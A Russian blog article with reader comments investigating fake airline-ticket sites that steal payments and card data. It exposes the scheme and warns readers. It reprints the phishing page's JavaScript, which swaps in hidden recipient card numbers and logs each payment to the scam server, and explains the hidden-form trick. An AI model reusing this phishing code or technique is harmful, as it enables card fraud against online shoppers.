История эта началась совсем недавно. Всего пять дней назад и, можно сказать, что пока еще не закончилась. Один мой знакомый обратился ко мне за консультацией с вопросом, можно ли как-нибудь закрыть «нехороший сайт»…
Итак, что же случилось?
Мой знакомый захотел купить авиабилеты и решил, что самый простой для этого способ — задать вопрос Яндексу. На простой запрос типа «самые дешевые билеты в Анапу» Яндекс одну из первых ссылок выдал на некий сайт, который служит для поиска и покупки дешевых билетов без комиссии. Ссылка эта, вероятно, была в верхнем рекламном блоке. Перейдя по ссылке, мой знакомый нашел себе подходящие билеты, оформил заказ, и попал на страницу оплаты с помощью банковской карты…
Сайт этот для среднего человека, если не вдаваться в детали, может оказаться совершенно обычным сайтом по поиску билетов и не вызвать подозрений. Домен _aviapromo.eu_
Вот так выглядит главная страница. Скриншот сохранился только с телефона.
Это поиск билетов:
Заказ оформлен:
Это страница оплаты:
На картинках мой пробный заказ, который я делал, чтобы разобраться, как работает этот сайт.
Мой знакомый оплатил билеты. При оплате по смс приходили коды подтверждения 3d Secure, которые, как это бывает обычно, нужно было вводить в браузере на соответствующей странице. Получив на почту «маршрутные квитанции» и считая, что билеты куплены, мой знакомый пошел заниматься своими делами.
На следующий день на телефон стали приходить «непонятные смс». Сначала пришла смс на списание с суммой в 2 рубля, и в ту же минуту эти 2 рубля вернули на карту с примечанием «отмена покупки». Еще через 2 часа непонятное списание и возврат 2 рублей повторились. И еще через минуту началось что-то невероятное. С карты списали 17700руб. Еще через 10 минут списали дополнительно 17700руб. Еще через 10 минут пытались списать 11800руб. Последняя операция не прошла только из-за того, что на карте кончились деньги. Я думаю, что если бы на карте был бы больший остаток, то списания бы продолжались каждые 10 минут до тех пор, пока не пришел бы отказ. История описываемых операций хорошо видна на заглавной фотографии — это скриншот смс'ок от Сбербанка, приходящих на телефон.
В момент первой «непонятной смс про 2 рубля», хоть это и показалось подозрительным, карта не была заблокирована. Все последующие списания были выполнены в течение 20-30 минут. Мой знакомый в это время был в общественном транспорте. Пытался дозвониться в Сбербанк для блокировки карты. Но как это обычно бывает, банк предлагал понажимать кнопочки в голосовом меню, а затем подождать в очереди. Быстро заблокировать карту через кол-центр банка не получилось. А приложение на смартфоне, через которое тоже можно было бы заблокировать карту, не было установлено. Карту потом заблокировали, но было уже поздно — деньги утекли. На следующий день мой знакомый написал заявление в сбербанк. На данный момент заявление находится на стадии рассмотрения. Карту перевыпустили.
Еще через два дня, уже когда карта была заблокирована, была попытка списать с карты 11800р, а еще через день новая попытка списать еще 23600руб. Т.е. это еще раз подтверждает, что тормозов у мошенников не было.
И на десерт, ко всем этим неожиданным списания, выяснилось, что никакой брони в авиакомпании нет и не было. Т.е. авиабилеты не были забронированы. Все было обманом и деньги ушли в неизвестном направлении.
В результате с карты украли (потери за оплаченные билеты и последующие списания) в общей сумме составили 47 377рублей. А могло бы быть гораздо больше.
Теперь попробуем разобраться, что же на самом деле произошло и где можно было обнаружить подвох.
1. Домен в зоне EU должен был по крайней мере насторожить.
2. Кроме поиска авиабилетов на сайте было всего несколько страниц, цель которых пустить пыль в глаза.
3. Если копнуть глубже, то указанный на странице ОГРН компании принадлежал компании, которая была закрыта в 2011 году. А само название компании в выписке ЕГРЮЛ и на сайте не совпадает, на сайте частично изменено. Проверить данные по ОГРН, ИНН и названию юридических лиц можно в базе налоговой инспекции egrul.nalog.ru.
4. Рейтинги сайта ТиЦ и PR нулевые (это видно в тех редких случаев, когда в браузере установлена панель вебмастера или что-то похожее).
5. Основное, что должно было насторожить. Должна была быть оплата без комиссии, как указано на сайте, 5900 за каждый авиабилет, а в смс от банка пришло назначение «Списание 5900.00 P2P PSBANK», а после оплаты этих 5900, приходила смс о том, что списано 5988,50р. Что такое «P2P» конечно знают не все. Можно было бы поискать. «P2P» — это сервис перевода с карты на карту. А сумма списания больше, чем сумма платежа, потому что банк, через который производился платеж, берет за это комиссию. Т.е. реально деньги, которые якобы оплачивались за авиабилеты, переводились на чью-то банковскую карту через сервис PSBANKa (Промсвязьбанк). При этом покупателю банк присылал проверочный код 3D Secure, который покупатель, ничего не подозревая, вводил в браузере.
6. Если с переводом на карту для меня понятно, что владельца карты ввели в заблуждение, чтобы он сам ввел код 3D Secure, то с последующими списаниями без проверки 3D Secure, для меня ситуация не совсем понятна. Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS). Единственный исключение, когда смс не запрашивается, — это когда операции производятся через мобильное приложение СбербанкОнлайн на телефоне. Но телефон похищен не был и данные от личного кабинета похищены не были. Очевидно, что были получены только данные банковской карты моего знакомого. И, имея только данные карты, деньги списывались при использовании сервиса YM (Yandex.Money) в пользу Yandex.Direct (рекламная сеть Яндекса). Здесь есть явно какая-то недоработка в системе безопасности и возникает вопрос либо к Сбербанку, либо к Яндексу, как они такое позволяют делать.
В результате складывается примерно такая картина работы мошеннического сайта:
Сайт через рекламу в Яндекс.Директ привлекает посетителей. Без рекламы таким сайтам выбраться в топ выдачи практически нереально. Выглядит сайт в чем-то похожим на нормальные сайты. Поиск рейсов и свободных мест работает отлично. Для этого сайт принимает запрос посетителя, просит его подождать, сам отправляет запрос на какой-то другой сайт, на котором есть реальные данные по авиабилетам, из полученного ответа вырезается лишнее и подготовленная информация выдается на своей странице. Вполне возможно, что и цены немного корректируются (цены я не проверял). Дальше посетитель оформляет заказ, вводя свои данные. Ввод данных выглядит также, как и на многих других сайтах по продаже билетов. После ввода данных и подтверждения заказа, покупателю сообщают код заказа и дают 24 часа на оплату. При оплате оригинальная страница одного из банков с сервисом перевода P2P переделывается определенным образом (об этом ниже) и встраивается на мошеннический сайт. «Покупатель» авиабилетов, если не заметит подвох, переводит деньги на какую-то чужую банковскую карту. При этом данные банковской карты «покупателя» перехватываются и в дальнейшем используются для списаний — при этом пополняется счет какого-то аккаунта в Яндекс.Директ для последующей рекламы и поиска новых жертв. Дальше все тоже самое по кругу.
После всей этой истории было написано заявление в полицию (на рассмотрении), в сбербанк (на рассмотрении), в Яндекс, хостинг-провайдеру и др.
Мошеннический сайт размещался на хостинге FirstVDS. По моему заявлению с подробным описанием аккаунт мошеннического сайта заблокировали. Правда, через полдня опять разблокировали. Но по повторному заявлению опять заблокировали (надеюсь, уже навсегда), сославшись на то, что разные отделы провайдера не разобрались. Конечно, это не полная блокировка — мошенники могут поменять хостинг.
Одержав хоть маленькую и временную, но победу с закрытием сайта, нужно было решать вопрос с авиабилетами. И какого же было удивление, когда по аналогичному поисковому запросу Яндекс на первой строчке рекламного блока выдал другой сайт, который имел слегка измененный дизайн, но имел практически тот же функционал и похожий движок. Его цель — обман посетителей, кража денег и данных кредитных карт. Т.е. после того, как один сайт задушен, тут же появляется новый сайт (точнее он и раньше работал, просто в рекламе поднимаются не все сразу). Адрес другого сайта, по «якобы продаже авиабилетов» — _avia-scanners.ru_. Если представители Яндекса захотят проверить, то вот полная ссылка из Яндекс.Директа (в которой есть идентификатор рекламодателя.
_http://avia-scanners.ru/?utm_source=yandex&utm_medium=cpc&utm_campaign=21628812&utm_content=2877643372&utm_term=%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B8%D0%BB%D0%B5%D1%82%D1%8B%20%D0%BF%D0%BE%20%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8%20%D0%B4%D0%B5%D1%88%D0%B5%D0%B2%D0%BE
То, что этот сайт мошеннический, видно сразу, даже не вникая в технические детали, — указанный ИНН не существует, указанный ОГРН не существует, указанное юридическое название — не существует, указанный почтовый адрес — не существует итп. ИНН вообще указан двенадцатизначный, что бывает только у ИП и физ.лиц.
На заглавной странице картинки, которые должны вести на страницы скачивания мобильных приложений (в AppStore, Google Play и магазине для Windows Phone). Но все эти картинки не содержат ссылок на мобильные приложения.
В этот раз было решено более детально разобрать, как же этот сайт вводит пользователей в заблуждение на странице оплаты. Технология оказалась несложная.
Это внешний вид страницы оплаты на сайте «поиска авиабилетов».
Посмотрим исходный код страницы. Видим подозрительные папки "...P2P..." с различными скриптами. В этих скриптах я не нашел ничего интересного, что могло бы быть связано с похищением средств. В основном там были скорее всего не модифицированные скрипты банка, про который речь пойдет ниже.
А вот канонический адрес страницы нам интересен. Мы здесь видим, что фактически страница сервиса банка Тинькова (_www.tinkoff.ru/cardtocard/_) почти полностью включена в мошеннический сайт. Причем здесь используется не окно iframe. Здесь именно при использовании промежуточной обработки на сервере хостинг-провайдера страница скачивается с сайта Тинькова, потом на сервере модифицируется и почти полностью с небольшими «бонусами» выкладывается.
Мое предположение было, что в HTML коде должен быть скрытый блок DIV, скрытая форма или что-нибудь похожее. А скорее всего несколько таких скрытых блоков. И предположение подтвердилось. Нажимаем в браузере F12 (средства для веб-разработки). Находим нужный нам скрытый блок. Видим в колонке справа его свойство display:none
Щелкаем по чекбоксу, чтобы отключить свойство display:none и… Тайное становится явным.
Мы видим предзаполненную форму с номером чужой кредитной карты, на которую должны уйти наши деньги.
А вот так выглядит оригинальная страница банка Тинькова. Правда похоже? Т.е. что происходит? Форма частично заполняется. Из этой формы скрывается все лишнее (блок с картой получателя), часть какая-то может быть даже не скрывается, а вырезается на сервере. И эта страница в измененном виде подсовывается посетителям сайта, в надежде, что они ничего не заподозрят.
И на десерт вот исходный html код с предзаполненным номером банковской карты получателя.
И вот еще интересный кусок кода.
Этот же кусок со скриптом в текстовом виде ниже:
Давайте попробуем разобраться, что в коде происходит.
В коде задан массив с номерами карт получателей. Эти номера скриптом подставляются в форму оплаты. Теоретически может быть семь разных карт получателя и при каждой неудачной попытке оплаты номер карты должен меняться. Но, вместо семи разных номеров, задан один и тот же номер несколько раз. Т.е. при неудачной попытке следующая попытка будет с тем же самым номером карты получателя.
И для того, чтобы был порядок, при каждой попытке оплаты данные передаются на страницу на этом мошенническом сайте, которая все записывает для бухгалтерии. Вечером, вероятно, придет «бухгалтер» и проверит записи в журнале.
$("#card_number").on('blur', function () {
$("#transfer__card_number").change();
});
function refr() {
$("#transfer__card_number").change();
}
popitka = 0;
function addpay(title, status) {
var newcards = [
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
'5106 2160 0313 4297',
];
if (status == 0) {
$('#card_number2').val(newcards[popitka]);
$('#card_number2').change();
popitka = popitka + 1;
}
$.ajax({
url: 'http://avia-scanners.ru/addpay.php?sum=' + 3272 + '&status=' + status + '&title=' + title + '&code=lyyPt',
success: function () {
xhr.abort();
}
});
}
$(document).ready(function () {
$("#card_number2").keyup();
$('#card_number2').change();
});
5106 2160 0313 4297
5106 2160 0408 7015
5106 2160 0310 8804
Что в этих картах сходного? Правильно, начальные цифры 5106 21…
Попробуем поискать по базе BIN номеров банков.
Вот такой интересный результат получается:
Issuing Bank: YANDEX MONEY NBCI.LLC
Card Type: MASTERCARD
Случайным образом мошенники используют рекламу от Яндекса (Яндекс.Директ), Сервис перевода денег Yandex.Money и дополнительно через сторонние банки выводят средства на банковские карты, выпущенные Яндексом. Абсолютно точно Яндекс в этих махинациях никак не замешан, но Яндекс мог бы сильно помочь в уменьшении количества мошеннических операций. Возможно для этого какие-то правила или регламенты нужно изменить. Письма в Яндекс я тоже писал. Информацию они приняли, как распорядятся ей, я не знаю. Помочь с блокировкой средств они мне не смогли, но написали, «По Вашему запросу мы провели расследование и приняли все необходимые меры...» Что меня приятно удивило в службе поддержки Яндекса, касающейся мошеннических операций, — в полтретьего ночи пишешь им письмо — через 10-15 минут приходит ответ живого человека.
Судя по сообщениям, которые я нашел в интернете, эти сайты работают давно и количество пострадавших немаленькое. А по прикидкам, пострадавших может быть довольно много. В интернете есть сообщения о пострадавших и годичной давности, а есть сообщения, размещенные пять дней назад, об оплаченных авиабилетах на мошенническом сайте, про который я в первой половине написал.
Но и это еще не все. На многих мошеннических сайтах по продаже авиабилетов есть одна общая черта, однозначно объединяющая их и указывая, что они относятся к одной группе. Здесь не буду писать, что это за особенность, чтобы не помогать злоумышленникам. Но вот только некоторые мошеннические сайты из этой группы найденные за несколько минут: _avialex.ru_, _avia-kassa.ru.com_, _flyseven.ru_, _aviasalesdirectly.ru_, _avia-run.ru_, _aviasalle.com_.
Часть из этих сайтов уже заблокирована и находится в черных списках на разных отзовиках. Последний сайт в списке сейчас прикинулся зайчиком. Это был очередной сайт, который ждал своего звездного часа. Он тоже расположен на хостинге FirstVDS. Сайт временно отключил мошеннический функционал, после того, как я и его попросил заблокировать. Поэтому пока его не заблокировали.
Т.е. мы видим, что это не разовая поделка. Мошенники годами используют отработанную схему. Используются домены в разных зонах, разные хостинги, сервисы разных банков для переводов с карты на карту (кроме Тинькова и Промсвязьбанка могут быть и другие), вывод денег производится на большое количество карт. Если только с одной карты можно легко угнать 47 тр, то какие могут быть в общем объеме вороваться суммы?
Со своей стороны я разных писем и заявлений много написал. Но всю сеть победить одному человеку затруднительно, если только не положить на это 100% своего времени.
Главное, будьте бдительны при оплате авиабилетов на незнакомых сайтах и тогда и мошенникам будет сложнее.
UDP.
Про _avia-scanners.ru_ я заявления провайдеру не писал (хостинг у этого сайта sprinthost.ru — отличается от первого). Этот сайт оставил для того, чтобы читатели публикации смогли его препарировать и разобрать. Сейчас этот сайт уже не работает.
Кто-то из читателей успел поиграть с ним. Но сейчас он не доступен. На главной странице «Forbidden/ You don't have permission to access / on this server. Apache/2.4.17 Server at avia-scanners.ru Port 80»
Почему _avia-scanners.ru_ стал недоступен, точной информации нет. Может не выдержал нагрузки, может представитель провайдера прочитал статью и закрыл сайт, может представители банка ТКС или Сбербанка прочитали статью и написал провайдеру, может Яндекс как-то посодействовал, может кто-то из представителей правоохранительных органов, а может админ этого сайта, завсегдатай geektimes и, прочитав статью, осознал что был не прав, и решил встать на путь исправления.
В любом случае Ваша активность помогла закрыть еще один фишинговый сайт. Я надеюсь, что это спасет кого-нибудь из потенциальных покупателей авиабилетов, от попадания в неприятную историю
UDP2 (27.09.2016)
Как я писал, количество сайтов может быть очень большим. Спасибо пользователю triton, он в комментариях указал еще три новых точно таких же мошеннических сайта _flying-avia.ru_, _scanner-ticket.ru_, _scanner-aero.ru_. Я уверен, что есть или появятся в ближайшее время и другие сайты. В нижней части этой публикации размещу сводную таблицу. Если кто-то еще найдет подобные сайты, готов добавить информацию о них в эту таблицу.
Пока три найденных новых сайта работают и те, кто не успел препарировать предыдущие сайты до того, как их закрыли, может сделать это сейчас. Эти новые три сайта работают практически одинаково, по той же самой схеме, что и разобранный в статье _avia-scanners.ru_. Минимальное изменение дизайна, минимальное изменение контактных данных. Мелочи типа девятизначного ИНН не принимаются в расчет. Используется тот же самый сервис банка Тинькова, что очень хорошо видно на скриншотах.
Публикация получилась длинной. Поэтому часть новых скриншотов буду убирать под спойлер.
_flying-avia.ru_
_scanner-aero.ru_
_aviasalle.com_
_flying-avia.ru_, если скрытые элементы показать. Здесь я кроме карты открыл еще скрытое поле «сумма».
_scanner-ticket.ru_, если показать скрытые элементы
_scanner-aero.ru_, если показать скрытые элементы
На новых трех сайтах обнаружены следующие номера кредитных карт, на которые мошенники выводят средства:
5106 2160 0451 0834 получена на _flying-avia.ru_
5106 2160 0909 7977 получена на_scanner-ticket.ru_
5106 2160 0451 0834 получена на_scanner-aero.ru_
Два из трех указанных сайтов, предлагают выводить средства на одну и ту же карту. Причем эти два сайта, хоть и расположены у одного хостинг-провайдера, но работают на разных IP (см. таблицу внизу). И опять новые карты выпущены Яндекс.Банком.
Дополнительно на новых сайтах при оплате предлагается на выбор два способа оплаты. Первый — картами, второй через терминалы. На первых описываемых сайтах, если я ничего не пропустил, не было возможности оплатить «авиабилеты» через терминал. Давайте посмотрим, как же происходит оплата через терминал. На сайтах выложена подробная инструкция «как оплатить через терминал» Инструкция длинная, размещена под спойлером. В этой инструкции вообще хитростей нет. Невнимательным покупателям предлагается просто прийти к терминалу и положить деньги на чей-то QIWI кошелек. Номер телефона кошелька в инструкции указан.
| Мошеннические сайты по продаже авиабилетов | ||
|---|---|---|
| _avialex.ru_ | Архивный | |
| _avia-kassa.ru.com_ | Архивный | |
| _flyseven.ru_ | Архивный | |
| _aviasalesdirectly.ru_ | Архивный | |
| _avia-run.ru_ | Архивный | |
| _aviasalle.com_ | Провайдер FirstVDS | Пока работает, после заявления скрыл мошеннический функционал |
| _aviapromo.eu_ | Провайдер FirstVDS | Заблокирован провайдером 22.09.2016 |
| _avia-scanners.ru_ | Провайдер Sprinthost, IP 141.8.195.50 | Перестал работать после статьи на geektimes 26.09.2016 |
| _flying-avia.ru_ | Провайдер Sprinthost, IP 141.8.195.50 | Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes |
| _scanner-ticket.ru_ | Провайдер Sprinthost, IP 141.8.195.50 | Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes |
| _scanner-aero.ru_ | Провайдер Sprinthost, IP 141.8.195.138 | Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes |
| _scaner-avia.ru_ | Провайдер Sprinthost, IP 141.8.195.138 | Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes |
| _pilotavia.ru_ | Провайдер TheFirst-RU clients (WebDC Msk), IP 188.120.250.184 | Был как две капли похож на _aviapromo.eu_ После упоминания в статье на geektimes по состоянию на 28.09.2016 отображается сообщение — «Сайт временно отключен» |
| _letofly.biz_ | Пока доступен. Был как две капли похож на _aviapromo.eu_, после упоминания на geektimes 29.09.2016 быстро сменил внешний вид, убрав мошеннический функционал. На сайте указано, что домен якобы выставлен на продажу. При этом в элементах нового дизайна используются логотипы и название немошеннического сайта | |
| _avia.netprosolution.co_ | РАБОТАЕТ, крадет деньги и данные карт, сильно но не полностью похож на _aviapromo.eu_. | |
Примечание по списку сайтов в таблице. Когда я начал составлять эту таблицу, я подозревал, что подобных сайтов много, но не подозревал, сколько именно. Простой поиск в поисковых системах дает ссылки на как минимум на пару десятков подобных сайтов. Некоторые из них еще есть в поисковиках, но уже недоступны (можно посмотреть только закешированную версию). Список ранее действовавших подобных сайтов, но уже заблокированных составляет более 400шт. Поэтому с Вашего позволения, я эту таблицу больше не буду дополнять, за исключением каких-либо особенных сайтов, разбор которых может быть интересен.
_economavia.ru_
_nticket.ru_
_red-avia.com_
_lykafe.ru_
_max-fly.ru_
_tourfly.biz_
_bilet-poisk.ru_
_masterfly.ru_
_future-fly.ru_
_tiptopair.ru_
_100bilet.ru_
_go-go-travel.com_
_point-avia.com_
_avianeo.ru_
_itarifyaviabilety.ru_
_eg-avia.ru_
_horoshoairbilety.ru_
_aviakassa-sales.ru_
_gogoavia.com_
_avia-toptickets.ru_
_poiskovik-airline.ru_
_ticket-online.ru_
_avia-fun.com_
_disavia.ru_
_expressaviabilet.ru_
_moi-avia.ru_
_онлайн-авиа.рф_
_slim-avia.org_
_fly-info.ru_
_aviakassaonline24.ru_
_bestavias.ru_
_oaviabiletychelny.ru_
_etoavia.ru_
_aviakassabiletov.ru_
_avia-online24.ru_
_onlinepolet.ru_
_tip-trip.biz_
_disaero.ru_
_ticket-planet.ru_
_flyglobal.ru_
_mainavia.ru_
_ticket2avia.ru_
_online-airlines.ru_
_super-avia.ru_
_fun-avia.com_
_avia-book.ru_
_poiskvnebo.ru_
_avia-world.ru_
_aviachild.ru_
_aviaonline.org_
_deshevoavia.ru_
_vnemli.ru_
_moifly.ru_
_экспресс-авиа.рф_
_grundfly.ru_
_airbiletyonline.ru_
_fast-fly.ru_
_zaaviabiletom.ru_
_splash-avia.com_
_bystro-aviabileti.ru_
_aviabulet.ru_
_xdavia.ru_
_mytripbonus.ru_
_broniruem-online.ru_
_newgoaaviabilety.ru_
_search-fly.ru_
_privat-air.org_
_biletnasamoletonline.ru_
_smilefly.ru_
_x-avia.ru_
_raido-rent.com_
_avia-rsexpress.ru_
_aviaspecmontag.ru_
_just-avia.ru_
_onlyavia.ru_
_letimairlanes.ru_
_avia-russia.ru_
_trip-avia.com_
_aviagold.ru_
_deshevo-poletet.ru_
_avia-kafe.ru_
_poisk-avia.ru_
_fly-land.ru_
_aviaup.ru_
_продажа-авиа.рф_
_airlines-travel.ru_
_cafe-avia.ru_
_avia-cloud.com_
_fly-corp.ru_
_eco-avia.com_
_ticket-aero24.ru_
_turscannerpro.ru_
_roomticket.ru_
_flyfiaryav.ru_
_express-avia.ru_
_broniruem24.ru_
_wow-avia.ru_
_sky-trips.ru_
_aviabin.ru_
Негативные отзывы, истории кражи денег при покупке билетов, черные списки можно найти на разных интернет-сайтах. При таком масштабе, в рамках этой статьи не имеет смысла в дежурном режиме обновлять таблицу. Масштаб действий мошенников на сайтах якобы продажи авиа (и иногда жд) билетов понятен. Когда есть один сайт, то мошенника вычислить и поймать не всегда возможно. Когда есть десятки и сотни сайтов, то, наверняка, мошенники не могут работать так, чтобы не оставалось следов. Или у провайдеров, или у банков, или у интернет-компаний, или у регистраторов доменов, или еще где-то должны оставаться следы. Поэтому если будет чьё-то волевое решение, то всю эту схему можно расследовать и найти ответственных за нее лиц.
UDP3:
Спасибо пользователю semb. В комментариях он указал еще на один сайт _pilotavia.ru_
Этот сайт примечателен тем, что он как две капли похож, на сайт _aviapromo.eu_ (на тот сайт, на котором герой этой статьи имел «неосторожность купить авиабилеты». Сайт этот продолжает работать. Это не просто похожий сайт, а такой же сайт, просто размещённый на другом хостинге и домене. Теперь есть возможность посмотреть подробнее, как сайт работает. Для тех, кто хочет поэкспериментировать, можно сразу начинать со ссылки _https://pilotavia.ru/?code=BX3FKT_ (Это ссылка с оформленным заказом, на которой есть возможность перейти к оплате. Времени на оплату дают 24 часа).
На следующей странице в панели вебмастера по загрузке файлов видно, что реальные данные по наличию мест на рейсах получаются с нормального не мошеннического сайта aviacassa_ru. Текстовые данные, вероятно, корректируются на сервере, а ссылки на картинки остаются без изменений.
Тем, кто справшивал про https и детали сертификата. Появилась возможность проверить.
Сайт использует защищенное соединение и сертификат от Let's Encrypt. Интересная особенность, — сертификат выпущен сроком на три месяца. Это, наверное, для экономии? Реально оценивают срок жизни такого сайта.
Еще одна деталь. Сайт использует сервис Webvisor от Яндекса. Видно по запросам в нижней части панели на картинке ниже. Для тех, кто не в курсе это очень удобный сервис для записи поведения пользователей на сайте. Потом можно смотреть что-то похожее на видео про то, что пользователи делали на сайте. Использование вебвизора означает несколько моментов. — Мошенник зарегистрировал сайт в Яндекс.Метрике имеет подробную статистику о действиях пользователей на его сайте. Возможно даже номера карт получаются из данных вебвизора, хотя скорее всего номера карт записываются программным путем на сайте. Оборотная сторона медали — у Яндекса хранится полностью запротоколированная история всех операций на фишинговом сайте. Т.е., теоретически, если к этой информации получат доступ правоохранительные органы (если это в принципе осуществимо), то можно полностью восстановить картину по каждому случаю мошенничества и понять объем мошеннических операций.
Теперь про сам механизм кражи денег _pilotavia.ru_, а значит и _aviapromo.eu_. Это сайты не используют страницу банка Тинькова. Поскольку кража денег, описываемая в этой статье, была осуществлена через P2P PSBANK (Промсвязьбанк), было предположение, что точно так же страница Промсвзяьбанка изменяется и подставляется пользователю. Но при анализе HTML кода страницы оплаты я не обнаружил, никаких частей страниц каких-либо банков, не используются встраиваемые окна iframe, вообще не используются скрипты, а сама страница очень простая и не похожа на страницу Промсвязьбанка.
<form class="b-card-feature-list clearfix" id="formPay" action="payp2p.php" method="post">
UDP4 (27.09.2016): Информация, для тех, кто спрашивал.
На данный момент деньги не вернули ни по платежам, которые ушли на чужие карты, ни по платежам, которые ушли в Яндекс.Директ. (Про платежи в Яндекс.Директ в банк было подано заявление менее через за 24 часа после списаний). Официального ответа от Сбербанка нет (15 дней еще не прошло). Сегодня для следователя делали бумажную выписку в отделении Сбербанка. Суммы списаны. Про получателей платежей в выписке никакой дополнительной информации нет.
Фрагмент выписки
UDP5 (30.09.2016). Пользователь Vad_R в личку прислал свою реальную историю «покупки авиабилетов», при которой у него четыре месяца назад с карты украли ~20500р. Этот случай добавляю в публикацию, чтобы показать какие ещё бывают «способы относительно честного отъема денег у населения». Описание и детали под спойлером.
Если коротко, то на первых этапах оформление выглядит очень красиво, а после ввода данных банковской карты, они просто отправляются мошенникам, которые даже не стали утруждать себя какой-либо маскировкой своих действий. В последнем сообщении, которые видит пользователь допущены как минимум три грамматические/орфографические ошибки. Вероятно, в этом случае работали двоечники…
После ввода данных карты деньги были выведены переводом на чью-то чужую карту через сервис MMBANKa (Банка Москвы). Деньги вернуть не удалось. Заявление в полицию было написано. Дело закрыто «из-за отсутствия события преступления»
Страница поиска рейсов
Страница заполнения данных пассажира
Страницы ввода данных банковской карты, к сожалению, нет.
А вот чем закончилось.
Карта была привязанной к кошельку в Яндекс.Деньгах. Вот выписка из личного кабинета Яндекс.Денег.
Ниже объяснение того, что произошло. Вот цитата из заявления потерпевшего, которое было подано в отдел полиции №1 «Алупкинский» УМВД России по г.Ялте
З А Я В Л Е Н И Е
Прошу провести проверку настоящего заявления по факту незаконного завладения принадлежащими мне денежными средствами (мошенничества) неизвестными мне лицами, которые используя сайт, предлагающий услуги по продаже авиа билетов, а именно _forair.ru_ присвоили сумму в размере 19967,45 руб
Я, 04 июня 2016 года при поиске подходящего по стоимости билета зашел на сайт _forair.ru_ Данный сайт был в выдаче платных рекламных объявлений Яндекс Директ. Меня интересовали 3 билета из Санкт-Петербурга в Симферополь, которые я приобретал для спортсменов – конников. 11 июня в г. Санкт-Петербурге пройдут соревнования по конному спорту, где будет участвовать команда спортсменов, представляющая Крым.
Заполнил страницу, на которой указал паспортные данные пассажиров и далее сайт перенаправил меня на страницу оплаты, на которой я ввел данные своей карты Яндекс-Деньги, включая номер карты, дату окончания действия и CVV 2 код. После оплаты суммы, в размере 19653,00 руб (данная сумма была указана к оплате) сайт выдал сообщение, что данные введены неправильно и я должен ожидать 14 дней возврата денег. (скриншот сообщения прилагаю)
Заподозрив неладное начал изучать отзывы о сайте _forair.ru_ в интернете и понял, что попал на сайт – мошенник. После чего я обратился в службу поддержки банка, где мне ответили, что не могут вернуть деньги и посоветовали заблокировать карту и обратиться в полицию. В настоящий момент карта уже заблокирована.
Цитата ответа Яндекс.Денег на электронное обращение потерпевшего № 2787878 (06.06.2016)
Мы провели расследование и приняли необходимые меры, однако, к сожалению, не смогли вернуть Ваш платёж.
...
Полиция фактически отказалась расследовать дело, сославшись на то, что Яндекс им не ответил. При этом ждали недолго. 05.06.2016 потерпевший подал заявление в полицию, 13.06.2016 получил отказ в возбуждении уголовного дня. За 8 дней отделение полиции должно было направить официальный запрос в Яндекс и получить ответ. Обратите внимание, что отделение полиции находится в Ялте. Если запрос был направлен не электронным образом, то это слишком короткий срок. Может полиции просто нужно было еще несколько дней подождать ответ от Яндекса? Как говориться, «На нет и суда нет». Полный текст ответа из полиции в картинках ниже. Фамилии и лишние данные были стерты.
===========================================================================
Если нужны подробности, обращайтесь к пользователю Vad_R
Комментарии (371)
Leo7777
26.09.2016 13:38Мне тоже не понятно как без подтверждения смс они смогли списывать суммы. Да и почему бы лишние деньги на карте не скидывать в какой-нибудь вклад, накопительный счет или сделать карту у которой свой счет, не привязанный к основному.
dartraiden
26.09.2016 13:46+2Recurring payments. Во многих сервисах так (где предусмотрена абонентская плата): достаточно один раз заплатить, а дальше та же сумма будет регулярно сниматься без вашего участия.
В данном случае, правда, суммы были разные, но технически это возможно.QWhisper
26.09.2016 13:48но был же платеж на карту просто? У сбера вроде такие вещи можно только через кабинет делать, или нет?
dartraiden
26.09.2016 13:54+2Про сбер не знаю, пользуюсь другой картой.
Но своему провайдеру и компании Blizzard я именно так и плачу — единожды ввёл на их сайте данные карты (и код из СМС), а они дальше ежемесячно сами списывают с неё абонентскую плату.
Greendq
27.09.2016 15:28У Близзов уровень доверия у визы/мастеркарда овер 9000, так что им можно. У амазона и годэдди тоже самое — им достаточно только номер кредитки, всё остальное не проверяется, даже дата и CVC.
Rumlin
26.09.2016 14:09+2Аналогично у PlayStation®Store. Люди, оплатившие с зарплатной карты, часто там страдают от автоматического списания, покупок игр с консоли.
SLASH_CyberPunk
26.09.2016 14:53Там только продление подписки ПСН автоматическое (которое можно отключить), все остальное проходит через ваш пароль и тысячу вопросов…
Rumlin
26.09.2016 16:00+1Если карта привязана к аккаунту, то покупка совершалась (два года назад) тихо без вопросов. Было очень актуально, когда крали аккаунты — успевали купить на этом аккаунте на солидные суммы, пока пользователь успевал понять и заблокировать зарплатную карту.
Trosp
26.09.2016 17:01+1У меня при покупке игр, как в Стиме, так и в ПСН ничего не требует. Убер, тот же, списывает не спрашивая.
Andy_Big
26.09.2016 19:26Алиэкспресс ничего не требует, списывает просто по кнопке «Купить». Правда, для этого нужно предварительно привязать карту к своему аккаунту :)
vikarti
27.09.2016 11:43у меня Стим всегда требует CVC2-код карты.
а вот Amazon ( магазин), Apple (и AppStore и iTunes Store), Google Play — спокойно с привязанных карт списывают вообще без всяких вопросов относительно карты.
Suvitruf
27.09.2016 09:53Нет. У меня пару раз было, что они автоматически какие-то игры покупали за меня. Не знаю, баг это или что.
Хорошо хоть, по запросу в таких случаях они деньги возвращали всегда.
xbox
26.09.2016 17:17В результате обманных действий покупатель подтвердил отправку денег на чью-то карту, а скорее всего на две разных. Если бы регулярная отправка была на эти же карты, то это может быть похоже на то, о чем Вы пишите. Но регулярная отправка включилась как раз совсем на другого получателя, на которого покупатель согласия не давал даже по ошибке.
vaslobas
26.09.2016 13:47+3На карте всего было 40 тысяч рублей. Что же нужно держать на карте по пять тысяч рублей и постоянно гонять деньги туда-сюда? Мороки слишком много.
Алиэкспресс списывает деньги тоже без всяких смс.
Allineer
26.09.2016 14:07+6> Что же нужно держать на карте по пять тысяч рублей
